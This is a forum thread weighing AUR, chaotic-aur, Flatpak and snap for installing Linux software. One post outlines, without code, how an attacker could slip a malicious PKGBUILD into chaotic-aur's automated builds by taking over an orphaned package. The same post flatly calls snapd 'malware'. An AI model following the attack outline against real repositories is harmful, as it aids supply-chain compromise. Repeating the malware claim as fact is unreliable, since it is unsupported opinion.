Maybe only if I use two Flatpak apps on my machines, the rest from the AUR. Someone suggested those two here on this forum.
in the meantime, I have come to alter my sight on this, I generally gave up snap packages, now using
chaotic-aur as a complement to the community-packages, actually Flatpak
is then a last resort.
What I did not like in AUR, were the long-lasting build and update runs. But as chaotic-aur
came in I can mainly neglect resorting to Flatpak.
AUR. The only flatpak I use is steam - because (at least in my head) it’s containerized in a way that makes it more stable because it’s one collective cohesive package not associated with anything else.
For me, the main advantage of flatpak over an AUR package is that if it’s installed per user, and /home is a separate partition, then you can reinstall the OS and your flatpaks will be available right away. On a multi-system, multi-distro network, flatpaks would also be an easy way to guarantee the same software versions.
That’s a bad idea, in my opinion. chaotic-aur automates the building of AUR packages. This is bad, because of the absence of human oversight, something AUR was never designed for.
If I were a malicious person, this is how I would attempt to spread my malware:
- I would gather some statistics on when
chaotic-aurbuilds packages from the AUR. - I would try to take over a reasonably popular package on the AUR (something that’s been orphaned), and upload a malicious PKGBUILD to the AUR just before it is built in the
chaotic-aur. - …
- Profit.
Of course, some details would have to be worked out, it certainly wouldn’t be this simple, but this is the general idea.
The automatic package building process wouldn’t notice a malicious PKGBUILD (whereas users who manually try to build the package probably would). Even after the PKGBULD would be taken off the AUR (which would happen fairly quickly), it might still remain in the chaotic-aur as a built package. It’s only enough to run it once as root, and I’d have complete control over many computers.
4 Likes
OK, that is a heavy chunk of information to digest, I was not aware of.
Thanks for your input…
@Kresimir If I pick up your line of thought, there also will be a trace of uncertainty to
track contents of snap and flatpak packages in the end ?
I think that @dalto mentioned this but this is 100% false
some of the original maintainers maintain their flatpak (and some AUR too) but a huge chunk of software on there is done by users similar to the AUR.
The one advantage i would say Flatpak has really is that the containerization tends to make the situation a bit better. I also frequently have much better luck running flatpaks of certain software than the AUR versions
One example is Natron, most of the time it doesnt even build from the AUR but the flatpak just works
It does not, if the packager is either malicious or incompetent (the two main concerns when it comes to installing software). It merely gives the user false sense of security.
The biggest advantage of the AUR is that you build the packages yourself (according to a recipe posted by someone online), so you can know exactly what goes in the package, assuming you care to know. If you don’t care to know, then this advantage of the AUR is completely lost to you.
With Flatpaks and AppImages, you have no idea what is packaged in them – you trust the packager.
With snaps, there is no uncertainty: snapd itself is malware, so even if individual snaps are safe (which may not be the case, there have certainly been cases of malware hidden in snap packages), the utility that installs, updates, and runs them, snapd, is not safe.
4 Likes
Made myself a conclusion…, I dropped snap, Flatpak and chaotic-aur, not because
I think there is an immediate threat, but just for the possibility of one,
otherwise, there is an uncertain situation created that one would know
using Windows, and I know, no one would want that.
While Endeavour-OS is a really great distro, my main system RebornOs, has
immense coverage, so there is no need for additional sources. And this
is a kind of solution for this thread’s a topic in the end, namely
minimize the need for external sources.
Should I encounter a such situation, I would resort to AUR.
So I am good for now, and happy having Linux around, and thanks
also for this great community here
which I am happy to belong to, this can not be appreciated enough.
1 Like
No snaps …no flatpak… I’m an AUR person! 
2 Likes
Bit late to the thread but here is my take.
1 ) use Aur for anything system related
2) use Flatpak for any applications that aren’t in the system repository
As a rule it’s best to minimise use of the Aur
1 Like
Late commenter as well, but here’s my situation.
In the previous install I used the AUR whenever something was available from there. It worked most of the time. Before reinstalling however, I had a nice amount of problems with some of the packages. chatty would not compile for the last 2 months (goodbye Twitch chat), intermittently some other packages had errors in the compilation process I wanted to test. And it seems that although I choose to “Remove build tools after installing” (paraphrasing), when a build process aborts because of an error it leaves the build tools installed, so with every broken build process I got more and more dependencies that I needed to clean up.
In this install, I am trying to go for flatpaks (current number of applications is 5) whenever I have the choice. I am currently seeing the first disadvantages of that solution. At the end I hope to make an informed decision on how to proceed in the future.
Before I switched back to Arch I was running Fedora and it was then I decided to run all proprietary applications and applications that require 32 bit libraries as Flatpaks. I then switched to EndeavorOS and then Arch, after a discussion I created about Flatpaks and Appimages I decided since I am on Arch I might as well just use the AUR for anything not in the default repos. I currently only use Flatpaks for applications that require 32 bit libraries which are Steam and Lutris.
Why? There are 32-bit libraries in the multilib repo.
I know that, I just dislike having to install a bunch of 32 bit libraries on my system just for two applications while the rest of my system are all 64 bit applications, so I rather run those as Flatpaks.
But why? You still have all those libraries bundled up in the flatpak.
In each flatpak, that is. So this way, you have about twice as much storage devoted to 32 bit libraries, since both flatpaks contain some of the same libraries.
3 Likes
Because I don’t see them in my package output then because they are in a container then. It’s just a personal thing/preference like how some people prefer a certain desktop environment or window manager over another.
My two Flatpaks take about 4.7G of storage, I have a 2T ssd for my desktop(and 1.1T free) and I have a nas where I keep my personal files and other files with 16T storage so I could care less about the tiny amount of extra space those two flatpaks take up. 
Yeah, but we are talking about best practices, not subjective personal preferences. But okay, it’s your computer, I can only say that in your place, I wouldn’t do it like that. 
1 Like
Using something other than the default package manager to install software is not bad practice, bad practice would logging into the graphical environment with the root account.
It may or may not be bad, but it’s certainly not best.